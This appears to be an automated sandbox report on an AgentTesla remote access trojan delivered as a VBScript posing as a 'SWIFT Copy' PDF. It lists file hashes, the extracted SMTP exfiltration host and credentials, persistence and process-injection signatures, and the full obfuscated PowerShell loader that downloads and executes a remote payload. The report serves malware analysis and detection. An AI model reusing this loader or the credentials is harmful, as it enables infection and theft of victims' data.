Analysis
-
max time kernel
143s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
29-04-2024 17:25
Static task
static1
Behavioral task
behavioral1
Sample
SWIFT Copy000224042024-pdf.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
SWIFT Copy000224042024-pdf.vbs
Resource
win10v2004-20240419-en
General
-
Target
SWIFT Copy000224042024-pdf.vbs
-
Size
34KB
-
MD5
ec0b0c5aca480e26979b6d7dda8cbb14
-
SHA1
a98b3addf15724c049e1f2e44a071df9e7b0df21
-
SHA256
d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170
-
SHA512
b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713
-
SSDEEP
384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.cash4cars.nz - Port:
587 - Username:
[email protected] - Password:
logs2024! - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2416 WScript.exe 7 2592 powershell.exe 9 2592 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2932 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2464 powershell.exe 2932 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2464 set thread context of 2932 2464 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2592 powershell.exe 2464 powershell.exe 2464 powershell.exe 2932 wab.exe 2932 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2932 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2416 wrote to memory of 2592 2416 WScript.exe powershell.exe PID 2416 wrote to memory of 2592 2416 WScript.exe powershell.exe PID 2416 wrote to memory of 2592 2416 WScript.exe powershell.exe PID 2592 wrote to memory of 2692 2592 powershell.exe cmd.exe PID 2592 wrote to memory of 2692 2592 powershell.exe cmd.exe PID 2592 wrote to memory of 2692 2592 powershell.exe cmd.exe PID 2592 wrote to memory of 2464 2592 powershell.exe powershell.exe PID 2592 wrote to memory of 2464 2592 powershell.exe powershell.exe PID 2592 wrote to memory of 2464 2592 powershell.exe powershell.exe PID 2592 wrote to memory of 2464 2592 powershell.exe powershell.exe PID 2464 wrote to memory of 2964 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2964 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2964 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2964 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2932 2464 powershell.exe wab.exe PID 2464 wrote to memory of 2932 2464 powershell.exe wab.exe PID 2464 wrote to memory of 2932 2464 powershell.exe wab.exe PID 2464 wrote to memory of 2932 2464 powershell.exe wab.exe PID 2464 wrote to memory of 2932 2464 powershell.exe wab.exe PID 2464 wrote to memory of 2932 2464 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"3⤵PID:2692
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"4⤵PID:2964
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5e44d83be9a7bee7471b5537eb9449ac4
SHA171cf5b343f2301261d5892e77546f393f1a320fe
SHA256eb7e9e756eaaae241537d372f5aeace0f2c488c78c153811bea7061ec14bc360
SHA512b5d795e50c03e1d731d9fac052d1633bbe73d00cd5243dde48040dfd32a8f48134cfe30ade6cbe8acf72404c68ef0a20d7d13d051c4c9d151f2b93edb1b0e3cc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F33NKT0XLGI480HAGR5T.tempFilesize
7KB
MD5c8e5d23b0f1a97e8f4bd5d5cc60c0829
SHA143aa2f7a34ee23dfce5b4c3d1d7c2716c93520cf
SHA2569ff7f822ba34c712f24d75637234e597ed80bc4d0cb11ec58ee6ec7ef04aaa63
SHA512a4e2b0a5b160bed966ab12e829be0337ce19764afc6db4de3de72c1a91ec19092886b0de0fe9ffc97dd717e2337a77e8c2940386b7447be9159fe31ae026a5eb
-
C:\Users\Admin\AppData\Roaming\refulge.BodFilesize
442KB
MD5d46f9ca4ea9e4dd43d582b9f2e38199e
SHA109f5c2a00e0f709038145b03889e3ab6263824ed
SHA25694dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e
SHA5127cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b
-
memory/2464-34-0x0000000006670000-0x00000000076A8000-memory.dmpFilesize
16.2MB
-
memory/2592-24-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-36-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-28-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-21-0x000000001B670000-0x000000001B952000-memory.dmpFilesize
2.9MB
-
memory/2592-25-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-27-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmpFilesize
9.6MB
-
memory/2592-35-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmpFilesize
9.6MB
-
memory/2592-23-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmpFilesize
9.6MB
-
memory/2592-38-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-37-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-39-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-26-0x0000000002BA0000-0x0000000002C20000-memory.dmpFilesize
512KB
-
memory/2592-22-0x0000000001D20000-0x0000000001D28000-memory.dmpFilesize
32KB
-
memory/2592-65-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmpFilesize
9.6MB
-
memory/2932-64-0x0000000000A50000-0x0000000001AB2000-memory.dmpFilesize
16.4MB
-
memory/2932-66-0x0000000000A50000-0x0000000000A92000-memory.dmpFilesize
264KB